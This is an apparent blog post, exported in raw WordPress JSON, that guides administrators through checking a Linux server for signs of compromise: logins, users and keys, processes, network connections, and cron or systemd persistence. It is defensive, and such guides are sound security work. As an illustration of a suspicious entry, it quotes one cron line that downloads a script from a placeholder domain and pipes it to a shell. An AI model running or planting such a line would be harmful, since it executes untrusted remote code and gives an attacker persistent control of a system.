A server compromise is not always obvious. Sometimes the website continues to work, SSH is available, the load looks normal, but the server may already have a malicious process, an unknown user, a hidden cron job, or outgoing traffic to suspicious addresses.<\/p>\n
In cybersecurity, such signs are called indicators of compromise<\/strong> \u2014 traces that may indicate hacking, infection, or unauthorized access. These signs are usually checked in logs, processes, network connections, and system changes.<\/p>\n The first thing to check is who logged in to the server and when. A common sign of compromise is a successful login from an unknown IP, at an unusual time, or under a user account that should not be used.<\/p>\n Check recent logins:<\/p>\n Check failed login attempts:<\/p>\n Check SSH logs on Debian\/Ubuntu:<\/p>\n Using journalctl:<\/p>\n What to look for:<\/strong><\/p>\n If you see a successful login from an unknown IP, this is already a serious reason to consider the server potentially compromised.<\/p>\n After gaining access, an attacker often tries to persist in the system: create a new user, add an SSH key, grant themselves sudo privileges, or modify an existing account.<\/p>\n Check users with shell access:<\/p>\n Check users with sudo access:<\/p>\n For AlmaLinux\/Rocky Linux\/CentOS:<\/p>\n Find all authorized_keys files:<\/p>\n Check the contents of the keys:<\/p>\n Suspicious signs:<\/strong><\/p>\n Important<\/strong> If the server starts heavily loading the CPU, RAM, disk, or network for no clear reason, this may be a sign of malicious activity. For example, a crypto miner, spam script, proxy, botnet client, or attack script may have appeared on the server.<\/p>\n Check the load:<\/p>\n Check processes:<\/p>\n Check systemd services:<\/p>\n What to look for:<\/strong><\/p>\n Examples of suspicious paths:<\/p>\n Not every unfamiliar process means a hack, but an unknown process with high load and a strange launch path is a serious signal.<\/p>\n A compromised server often starts connecting to external IPs, sending spam, participating in DDoS attacks, working as a proxy, or opening a new port for remote control.<\/p>\n Check listening ports:<\/p>\n Check active connections:<\/p>\n View processes that use the network:<\/p>\n What should raise concern:<\/strong><\/p>\n NIST, in its incident handling guide, separately highlights data analysis and determining the correct response as an important part of incident handling. In practice, network connections, logs, and processes are among the first sources to check.<\/p>\n Attackers often add a cron job or systemd unit so that a malicious script starts again after a reboot or after the process is removed.<\/p>\n Check the current user\u2019s cron:<\/p>\n Check root cron:<\/p>\n Check system cron files:<\/p>\n Check systemd unit files:<\/p>\n View recently modified files:<\/p>\n Suspicious signs:<\/p>\n Example of a suspicious line:<\/p>\n * * * * * curl -fsSL http:\/\/unknown-domain.example\/run.sh | sh<\/span><\/p>\n If one or more points match, it is better to treat the server as potentially compromised.<\/p>\n Minimum actions:<\/strong><\/p>\n in case of a serious compromise, reinstall the server and restore only clean data.<\/p>\n Important<\/strong> These were the 5 main signs of server compromise:<\/p>\n One sign does not always prove a hack, but several matches almost always require urgent investigation. It is better to act carefully: save logs, restrict access, check the system, and, if necessary, move the project to a clean server.<\/p>\n\n\n <\/p>\n","protected":false},"excerpt":{"rendered":" A server compromise is not always obvious. Sometimes the website continues to work, SSH is available, the load looks normal, but the server may already have a malicious process, an unknown user, a hidden cron job, or outgoing traffic to suspicious addresses. In cybersecurity, such signs are called indicators of compromise \u2014 traces that may […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[1094,237],"class_list":["post-20108","post","type-post","status-publish","format-standard","hentry","tag-compromise","tag-server"],"yoast_head":"\n1. Suspicious SSH Logins<\/b><\/span><\/h2>\n
last<\/span><\/pre>\nsudo lastb<\/span><\/pre>\nsudo grep \"Accepted\" \/var\/log\/auth.log<\/span>
sudo grep \"Failed password\" \/var\/log\/auth.log<\/span><\/pre>\nsudo journalctl -u ssh --since \"24 hours ago\"<\/span><\/pre>\n\n
2. Unknown Users, SSH Keys, or sudo Access<\/b><\/span><\/h2>\n
awk -F: '$7 ~ \/(bash|sh|zsh)$\/ {print $1, $7}' \/etc\/passwd<\/span><\/pre>\ngetent group sudo<\/span><\/pre>\ngetent group wheel<\/span><\/pre>\nsudo find \/home \/root -name authorized_keys -type f -print<\/span><\/pre>\nsudo cat \/root\/.ssh\/authorized_keys<\/span>
sudo cat \/home\/USER\/.ssh\/authorized_keys<\/span><\/pre>\n\n
Do not delete suspicious data immediately if you plan to investigate. First, save logs and snapshots of the system state.<\/p>\n3. Unknown Processes and High Load<\/b><\/span><\/h2>\n
top (htop, atop)<\/span><\/pre>\nps aux --sort=-%cpu | head<\/span>
ps aux --sort=-%mem | head<\/span><\/pre>\nsystemctl --type=service --state=running<\/span>
systemctl --failed<\/span><\/pre>\n\n
\/tmp\/.x\/<\/span>
\/var\/tmp\/.cache\/<\/span>
\/dev\/shm\/.run\/<\/span><\/pre>\n4. Unusual Network Connections and Open Ports<\/b><\/span><\/h2>\n
sudo ss -tulpn<\/span><\/pre>\nsudo ss -tunap<\/span><\/pre>\nsudo lsof -i -P -n<\/span><\/pre>\n\n
5. Suspicious cron Jobs, Autostart, and Modified Files<\/b><\/span><\/h2>\n
crontab -l<\/span><\/pre>\nsudo crontab -l<\/span><\/pre>\nsudo ls -lah \/etc\/cron.d\/<\/span>
sudo ls -lah \/etc\/cron.hourly\/<\/span>
sudo ls -lah \/etc\/cron.daily\/<\/span><\/pre>\nsystemctl list-unit-files --type=service<\/span><\/pre>\nsudo find \/etc \/var\/www \/tmp \/var\/tmp \/dev\/shm -type f -mtime -3 2>\/dev\/null<\/span><\/pre>\n\n
What to Do If There Are Signs of a Hack<\/h3>\n
\n
If the server was used for payments, personal data, or client projects, it is better to conduct a full investigation and not limit yourself to deleting the suspicious process.<\/p>\nConclusion<\/h2>\n
\n